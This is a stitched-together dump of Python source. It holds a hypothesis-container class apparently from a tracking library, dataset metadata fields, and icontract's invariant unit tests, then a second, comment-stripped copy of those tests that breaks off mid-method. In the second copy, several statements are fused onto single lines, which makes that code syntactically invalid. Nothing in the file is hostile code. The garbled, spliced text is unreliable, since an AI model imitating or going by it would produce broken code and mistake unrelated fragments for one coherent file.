class MultipleHypothesis(Type, Sized, Iterable, Container):
single_hypotheses: Sequence[SingleHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.SingleHypothesis`. Default `None` "
"which initialises with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.SingleHypothesis`. Default "
"is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if any(not isinstance(hypothesis, SingleHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-SingleHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
if self.normalise:
self.normalise_probabilities()
def __len__(self):
return self.single_hypotheses.__len__()
def __contains__(self, index):
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return True
return False
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return True
return False
if isinstance(index, SingleHypothesis):
return index in self.single_hypotheses
def __iter__(self):
for hypothesis in self.single_hypotheses:
yield hypothesis
def __getitem__(self, index):
if isinstance(index, int):
return self.single_hypotheses[index]
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return hypothesis
return None
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return hypothesis
return None
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError("MultipleHypothesis not composed of Probability"
" hypotheses!")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
for hypothesis in self.single_hypotheses:
hypothesis.probability =\
(hypothesis.probability * total_weight)/sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if isinstance(hypothesis.measurement, MissedDetection):
if hasattr(hypothesis, 'probability'):
return hypothesis.probability
return None
class MultipleCompositeHypothesis(Type, Sized, Iterable, Container):
single_hypotheses: Sequence[CompositeHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.CompositeHypothesis`. Default `None` which initialises "
"with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.CompositeHypothesis`. Default is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if not all(isinstance(hypothesis, CompositeHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-CompositeHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
if self.normalise:
self.normalise_probabilities()
def __contains__(self, index):
if isinstance(index, CompositeHypothesis):
return any(index is single_hypothesis for single_hypothesis in self.single_hypotheses)
def __getitem__(self, index):
return self.single_hypotheses.__getitem__(index)
def __iter__(self):
return self.single_hypotheses.__iter__()
def __len__(self):
return self.single_hypotheses.__len__()
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError(
"MultipleHypothesis not composed of composite hypotheses with probabilities")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
for hypothesis in self.single_hypotheses:
hypothesis.probability = \
(hypothesis.probability * total_weight) / sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if hasattr(hypothesis, 'probability') and not hypothesis:
return hypothesis.probability
return None
| true | true |
1c4a72bba58f35607b720e9dfaa0b6d738ef6fd0 | 26,738 | py | Python | tests/test_invariant.py | kklein/icontract | 718ef1733cc2cce6d3c8f59a5a37de96f8be6664 | [
"MIT"
] | 244 | 2018-08-15T22:58:58.000Z | 2022-03-12T16:10:39.000Z | tests/test_invariant.py | kklein/icontract | 718ef1733cc2cce6d3c8f59a5a37de96f8be6664 | [
"MIT"
] | 157 | 2018-08-29T21:36:47.000Z | 2022-02-14T19:30:24.000Z | tests/test_invariant.py | kklein/icontract | 718ef1733cc2cce6d3c8f59a5a37de96f8be6664 | [
"MIT"
] | 23 | 2019-04-24T11:09:10.000Z | 2022-02-14T15:56:26.000Z | # pylint: disable=missing-docstring
# pylint: disable=invalid-name
# pylint: disable=unused-argument
import textwrap
import time
import unittest
from typing import Dict, Iterator, Mapping, Optional, Any, NamedTuple # pylint: disable=unused-import
import icontract
import tests.error
import tests.mock
class TestOK(unittest.TestCase):
def test_init(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
inst = SomeClass()
self.assertEqual(100, inst.x)
def test_instance_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 1000
inst = SomeClass()
inst.some_method()
self.assertEqual(1000, inst.x)
def test_unbound_instance_method_with_self_as_kwarg(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 1000
inst = SomeClass()
func = inst.some_method.__func__ # type: ignore
func(self=inst)
def test_magic_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __call__(self) -> None:
self.x = 1000
inst = SomeClass()
inst()
self.assertEqual(1000, inst.x)
def test_class_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@classmethod
def some_class_method(cls) -> None:
pass
inst = SomeClass()
self.assertEqual(100, inst.x)
def test_static_method(self) -> None:
# Adapted from https://github.com/Parquery/icontract/issues/186
@icontract.invariant(lambda self: A.some_static_method(self.x))
@icontract.invariant(lambda self: self.some_instance_method())
class A:
def __init__(self) -> None:
self.x = 10
def some_instance_method(self) -> bool:
# We need this instance method for easier debugging.
return self.x < 100
@staticmethod
def some_static_method(x: int) -> bool:
return x > 0
_ = A()
def test_inherited_static_method(self) -> None:
@icontract.invariant(lambda self: A.some_static_method(self.x))
@icontract.invariant(lambda self: self.some_instance_method())
class A:
def __init__(self) -> None:
self.x = 10
def some_instance_method(self) -> bool:
# We need this instance method for easier debugging.
return self.x < 100
@staticmethod
def some_static_method(x: int) -> bool:
return x > 0
# We need to test for inheritance.
# See https://stackoverflow.com/questions/14187973/#comment74562120_37147128
class B(A):
pass
_ = B()
def test_protected_method_may_violate_inv(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
# A protected method is allowed to break the invariant.
def _some_protected_method(self) -> None:
self.x = -1
def some_method(self) -> None:
self._some_protected_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_broken_before_protected_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
# A protected method can not expect the invariant to hold.
def _some_protected_method(self) -> None:
pass
def some_method(self) -> None:
self.x = -1
self._some_protected_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_private_method_may_violate_inv(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
# A private method is allowed to break the invariant.
def __some_private_method(self) -> None:
self.x = -1
def some_method(self) -> None:
self.__some_private_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_broken_before_private_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
# A private method can not expect the invariant to hold.
def __some_private_method(self) -> None:
pass
def some_method(self) -> None:
self.x = -1
self.__some_private_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_with_empty_arguments(self) -> None: # pylint: disable=no-self-use
z = 42
@icontract.invariant(lambda: z == 42)
class A:
pass
_ = A()
def test_no_dict_pollution(self) -> None:
testSelf = self
@icontract.invariant(lambda self: self.mustHold())
class A:
def mustHold(self) -> bool:
testSelf.assertDictEqual({}, self.__dict__)
return True
_ = A()
def test_new_exempted(self) -> None:
# This test is related to the issue #167.
new_call_counter = 0
init_call_counter = 0
@icontract.invariant(lambda self: True)
class Foo:
def __new__(cls, *args, **kwargs) -> 'Foo': # type: ignore
nonlocal new_call_counter
new_call_counter += 1
return super(Foo, cls).__new__(cls) # type: ignore
def __init__(self) -> None:
nonlocal init_call_counter
init_call_counter += 1
_ = Foo()
self.assertEqual(1, new_call_counter)
self.assertEqual(1, init_call_counter)
def test_subclass_of_generic_mapping(self) -> None:
# This test is related to the issue #167.
counter = 0
def increase_counter(self: Any) -> bool:
nonlocal counter
counter += 1
return True
@icontract.invariant(increase_counter)
class Foo(Mapping[str, int]):
def __init__(self, table: Dict[str, int]) -> None:
self._table = table
def __getitem__(self, key: str) -> int:
return self._table[key]
def __iter__(self) -> Iterator[str]:
return iter(self._table)
def __len__(self) -> int:
return len(self._table)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self._table)
f = Foo({'a': 1}) # test the constructor
_ = f['a'] # test __getitem__
_ = iter(f) # test __iter__
_ = len(f) # test __len__
_ = str(f) # test __str__
# 1 invariant check after the constructor +
# 4 checks before the methods +
# 4 checks after the methods.
self.assertEqual(9, counter)
class TestViolation(unittest.TestCase):
def test_init(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self, x: int) -> None:
self.x = x
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
_ = SomeClass(x=1)
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = SomeClass(x=0)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was 0"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_as_precondition(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 10
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.x = -1
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_magic_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __call__(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_multiple_invs_first_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
@icontract.invariant(lambda self: self.x < 10)
class SomeClass:
def __init__(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = SomeClass()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_multiple_invs_last_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
@icontract.invariant(lambda self: self.x < 10)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = SomeClass()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x < 10:
self was an instance of SomeClass
self.x was 100"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_violated_after_pre(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.require(lambda y: y > 0)
def some_method(self, y: int) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.some_method(y=-1)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
y > 0:
self was an instance of SomeClass
y was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
violation_error = None
try:
inst = SomeClass()
inst.some_method(y=100)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_ok_but_post_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.ensure(lambda result: result > 0)
def some_method(self) -> int:
self.x = 10
return -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
result > 0:
result was -1
self was an instance of SomeClass"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_violated_but_post_ok(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.ensure(lambda result: result > 0)
def some_method(self) -> int:
self.x = -1
return 10
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_with_empty_arguments(self) -> None:
z = 42
@icontract.invariant(lambda: z != 42)
class A:
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = A()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
z != 42:
self was an instance of A
z was 42"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_condition_as_function(self) -> None:
def some_condition(self: 'A') -> bool:
return self.x > 0
@icontract.invariant(some_condition)
class A:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "A(x={})".format(self.x)
# Valid call
a = A()
# Invalid call
violation_error = None # type: Optional[icontract.ViolationError]
try:
a.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual('some_condition: self was A(x=-1)', tests.error.wo_mandatory_location(str(violation_error)))
def test_condition_as_function_with_default_argument_value(self) -> None:
def some_condition(self: 'A', y: int = 0) -> bool:
return self.x > y
@icontract.invariant(some_condition)
class A:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "A(x={})".format(self.x)
# Valid call
a = A()
# Invalid call
violation_error = None # type: Optional[icontract.ViolationError]
try:
a.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual('some_condition: self was A(x=-1)', tests.error.wo_mandatory_location(str(violation_error)))
class TestProperty(unittest.TestCase):
def test_property_getter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
self.toggled = True
return 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = some_inst.some_prop
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_property_setter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
return 0
@some_prop.setter
def some_prop(self, value: int) -> None:
self.toggled = True
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None # type: Optional[icontract.ViolationError]
try:
some_inst.some_prop = 0
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_property_deleter(self) -> None:
@icontract.invariant(lambda self: not self.toggled)
class SomeClass:
def __init__(self) -> None:
self.toggled = False
@property
def some_prop(self) -> int:
return 0
@some_prop.deleter
def some_prop(self) -> None:
self.toggled = True
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
some_inst = SomeClass()
violation_error = None # type: Optional[icontract.ViolationError]
try:
del some_inst.some_prop
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
not self.toggled:
self was an instance of SomeClass
self.toggled was True"""), tests.error.wo_mandatory_location(str(violation_error)))
class TestError(unittest.TestCase):
def test_as_type(self) -> None:
@icontract.invariant(lambda self: self.x > 0, error=ValueError)
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None # type: Optional[ValueError]
try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of A
self.x was 0"""), tests.error.wo_mandatory_location(str(value_error)))
def test_as_function(self) -> None:
@icontract.invariant(
lambda self: self.x > 0, error=lambda self: ValueError("x must be positive, but got: {}".format(self.x)))
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None # type: Optional[ValueError]
try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual('x must be positive, but got: 0', str(value_error))
def test_as_function_with_empty_args(self) -> None:
@icontract.invariant(lambda self: self.x > 0, error=lambda: ValueError("x must be positive"))
class A:
def __init__(self) -> None:
self.x = 0
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
value_error = None # type: Optional[ValueError]
try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertIsInstance(value_error, ValueError)
self.assertEqual('x must be positive', str(value_error))
class TestToggling(unittest.TestCase):
def test_disabled(self) -> None:
@icontract.invariant(lambda self: self.x > 0, enabled=False)
class SomeClass:
def __init__(self) -> None:
self.x = -1
inst = SomeClass()
self.assertEqual(-1, inst.x)
class TestBenchmark(unittest.TestCase):
@unittest.skip("Skipped the benchmark, execute manually on a prepared benchmark machine.")
def test_benchmark_when_disabled(self) -> None:
def some_long_condition() -> bool:
time.sleep(5)
return True
@icontract.invariant(lambda self: some_long_condition(), enabled=False)
class SomeClass:
def __init__(self) -> None:
self.x = 100
class AnotherClass:
def __init__(self) -> None:
self.x = 100
start = time.time()
_ = SomeClass()
duration_with_inv = time.time() - start
start = time.time()
_ = AnotherClass()
duration_wo_inv = time.time() - start
self.assertLess(duration_with_inv / duration_wo_inv, 1.2)
class TestInvalid(unittest.TestCase):
def test_with_invalid_arguments(self) -> None:
val_err = None # type: Optional[ValueError]
try:
@icontract.invariant(lambda self, z: self.x > z)
class _:
def __init__(self) -> None:
self.x = 100
except ValueError as err:
val_err = err
self.assertIsNotNone(val_err)
self.assertEqual("Expected an invariant condition with at most an argument 'self', but got: ['self', 'z']",
str(val_err))
def test_no_boolyness(self) -> None:
@icontract.invariant(lambda self: tests.mock.NumpyArray([True, False]))
class A:
def __init__(self) -> None:
pass
value_error = None # type: Optional[ValueError]
try:
_ = A()
except ValueError as err:
value_error = err
self.assertIsNotNone(value_error)
self.assertEqual('Failed to negate the evaluation of the condition.',
tests.error.wo_mandatory_location(str(value_error)))
if __name__ == '__main__':
unittest.main()
| 32.214458 | 117 | 0.559803 | import textwrap
import time
import unittest
from typing import Dict, Iterator, Mapping, Optional, Any, NamedTuple
import icontract
import tests.error
import tests.mock
class TestOK(unittest.TestCase):
def test_init(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
inst = SomeClass()
self.assertEqual(100, inst.x)
def test_instance_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 1000
inst = SomeClass()
inst.some_method()
self.assertEqual(1000, inst.x)
def test_unbound_instance_method_with_self_as_kwarg(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 1000
inst = SomeClass()
func = inst.some_method.__func__
func(self=inst)
def test_magic_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __call__(self) -> None:
self.x = 1000
inst = SomeClass()
inst()
self.assertEqual(1000, inst.x)
def test_class_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@classmethod
def some_class_method(cls) -> None:
pass
inst = SomeClass()
self.assertEqual(100, inst.x)
def test_static_method(self) -> None:
@icontract.invariant(lambda self: A.some_static_method(self.x))
@icontract.invariant(lambda self: self.some_instance_method())
class A:
def __init__(self) -> None:
self.x = 10
def some_instance_method(self) -> bool:
return self.x < 100
@staticmethod
def some_static_method(x: int) -> bool:
return x > 0
_ = A()
def test_inherited_static_method(self) -> None:
@icontract.invariant(lambda self: A.some_static_method(self.x))
@icontract.invariant(lambda self: self.some_instance_method())
class A:
def __init__(self) -> None:
self.x = 10
def some_instance_method(self) -> bool:
return self.x < 100
@staticmethod
def some_static_method(x: int) -> bool:
return x > 0
class B(A):
pass
_ = B()
def test_protected_method_may_violate_inv(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def _some_protected_method(self) -> None:
self.x = -1
def some_method(self) -> None:
self._some_protected_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_broken_before_protected_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def _some_protected_method(self) -> None:
pass
def some_method(self) -> None:
self.x = -1
self._some_protected_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_private_method_may_violate_inv(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __some_private_method(self) -> None:
self.x = -1
def some_method(self) -> None:
self.__some_private_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_broken_before_private_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __some_private_method(self) -> None:
pass
def some_method(self) -> None:
self.x = -1
self.__some_private_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_with_empty_arguments(self) -> None: z = 42
@icontract.invariant(lambda: z == 42)
class A:
pass
_ = A()
def test_no_dict_pollution(self) -> None:
testSelf = self
@icontract.invariant(lambda self: self.mustHold())
class A:
def mustHold(self) -> bool:
testSelf.assertDictEqual({}, self.__dict__)
return True
_ = A()
def test_new_exempted(self) -> None:
new_call_counter = 0
init_call_counter = 0
@icontract.invariant(lambda self: True)
class Foo:
def __new__(cls, *args, **kwargs) -> 'Foo': nonlocal new_call_counter
new_call_counter += 1
return super(Foo, cls).__new__(cls)
def __init__(self) -> None:
nonlocal init_call_counter
init_call_counter += 1
_ = Foo()
self.assertEqual(1, new_call_counter)
self.assertEqual(1, init_call_counter)
def test_subclass_of_generic_mapping(self) -> None:
counter = 0
def increase_counter(self: Any) -> bool:
nonlocal counter
counter += 1
return True
@icontract.invariant(increase_counter)
class Foo(Mapping[str, int]):
def __init__(self, table: Dict[str, int]) -> None:
self._table = table
def __getitem__(self, key: str) -> int:
return self._table[key]
def __iter__(self) -> Iterator[str]:
return iter(self._table)
def __len__(self) -> int:
return len(self._table)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self._table)
f = Foo({'a': 1}) _ = f['a'] _ = iter(f) _ = len(f) _ = str(f)
self.assertEqual(9, counter)
class TestViolation(unittest.TestCase):
def test_init(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self, x: int) -> None:
self.x = x
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
_ = SomeClass(x=1)
violation_error = None try:
_ = SomeClass(x=0)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was 0"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_as_precondition(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 10
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
inst = SomeClass()
inst.x = -1
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
inst = SomeClass()
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_magic_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __call__(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
inst = SomeClass()
inst()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_multiple_invs_first_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
@icontract.invariant(lambda self: self.x < 10)
class SomeClass:
def __init__(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
_ = SomeClass()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_multiple_invs_last_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
@icontract.invariant(lambda self: self.x < 10)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
_ = SomeClass()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x < 10:
self was an instance of SomeClass
self.x was 100"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_violated_after_pre(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@icontract.require(lambda y: y > 0)
def some_method(self, y: int) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None try:
inst = SomeClass()
inst.some_method(y=-1)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
y > 0:
self was an instance of SomeClass
y was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
violation_error = None
try:
inst = SomeClass()
inst.some_method(y=100)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_ok_but_post_violated(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
